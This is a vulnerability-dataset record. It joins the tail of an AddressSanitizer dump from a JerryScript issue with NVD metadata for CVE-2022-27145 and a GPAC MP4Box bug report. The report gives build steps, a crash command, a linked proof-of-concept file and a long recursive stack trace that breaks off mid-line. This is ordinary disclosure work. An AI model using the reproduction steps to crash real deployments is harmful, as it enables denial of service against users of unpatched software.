fa 0x0c247fff8a90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c247fff8ad0: fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8ae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8af0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8b00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==38036==ABORTING Aborted ``` ###### Output See above. ###### Backtrace See above. ###### Expected behavior Not to crash
Heap-overflow on an ill-formed JS program
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4754/comments
1
2021-08-28T22:00:46Z
2021-11-02T07:36:17Z
https://github.com/jerryscript-project/jerryscript/issues/4754
981,936,669
4,754
CVE-2022-27145
2022-04-08T16:15:08.327
GPAC mp4box 1.1.0-DEV-rev1727-g8be34973d-master has a stack-overflow vulnerability in function gf_isom_get_sample_for_movie_time of mp4box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2108" }, { "source": "[email protected]", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2108
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
## Description There is a statck-overflow detected by AddressSanitizer ## System info ``` Ubuntu 20.04.2 LTS clang version 12.0.0-++20210402082642+04ba60cfe598-1~exp1~20210402063359.71 MP4Box - GPAC version 1.1.0-DEV-rev1727-g8be34973d-master ``` ## Build command ``` ./configure --static-mp4box --prefix=`realpath ./install` --enable-sanitizer --cc=clang --cxx=clang++ ``` ## crash command ``` MP4Box -frag 0 -out /dev/null poc_file ``` ## Pocs [poc.zip](https://github.com/gpac/gpac/files/8020756/poc.zip) ## Crash output ``` ==5882==ERROR: AddressSanitizer: stack-overflow on address 0x7fff020baff8 (pc 0x0000007cd878 bp 0x7fff020bb0c0 sp 0x7fff020bb000 T0) #0 0x7cd878 in GetMediaTime/programs/mp4box/builds/build10/src/isomedia/isom_intern.c:1108:8 #1 0x7de0a0 in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c:2311:6 #2 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #3 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #4 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #5 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #6 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #7 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #8 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #9 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #10 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #11 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #12 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #13 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #14 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #15 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #16 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #17 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #18 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #19 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #20 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #21 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #22 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #23 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #24 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #25 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #26 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #27 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #28 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #29 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #30 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #31 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #32 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #33 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #34 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #35 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #36 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #37 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #38 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #39 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #40 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #41 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #42 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #43 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #44 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #45 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #46 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #47 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #48 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #49 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #50 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #51 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #52 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #53 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #54 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #55 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #56 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #57 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #58 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #59 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #60 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #61 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #62 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #63 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #64 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #65 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #66 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #67 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #68 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #69 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #70 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #71 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #72 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #73 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #74 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #75 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #76 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #77 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #78 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #79 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #80 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #81 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #82 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #83 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #84 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #85 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #86 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #87 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #88 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #89 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #90 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #91 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #92 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #93 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #94 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #95 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #96 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #97 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #98 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #99 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #100 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #101 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #102 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #103 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #104 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #105 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #106 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #107 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #108 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #109 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #110 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #111 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #112 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #113 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #114 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #115 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #116 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #117 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #118 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #119 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #120 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #121 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #122 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #123 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #124 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #125 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #126 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #127 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #128 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #129 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #130 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #131 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #132 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #133 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #134 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #135 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #136 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #137 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #138 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #139 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #140 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #141 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #142 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #143 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #144 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #145 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #146 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #147 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #148 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #149 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #150 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #151 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #152 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #153 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #154 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #155 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #156 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #157 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #158 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #159 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #160 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #161 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #162 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #163 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #164 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #165 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #166 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #167 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #168 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #169 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #170 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #171 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #172 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #173 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #174 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #175 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #176 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #177 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #178 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #179 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #180 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #181 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #182 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #183 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #184 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #185 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #186 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #187 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #188 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #189 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #190 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #191 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #192 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #193 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #194 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #195 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #196 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #197 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #198 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #199 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #200 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #201 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #202 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #203 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #204 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #205 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #206 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #207 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #208 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #209 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #210 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #211 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #212 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #213 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #214 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #215 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #216 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #217 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #218 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #219 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #220 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #221 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #222 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #223 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #224 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #225 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #226 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #227 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #228 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #229 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #230 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #231 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #232 0x7de76e in 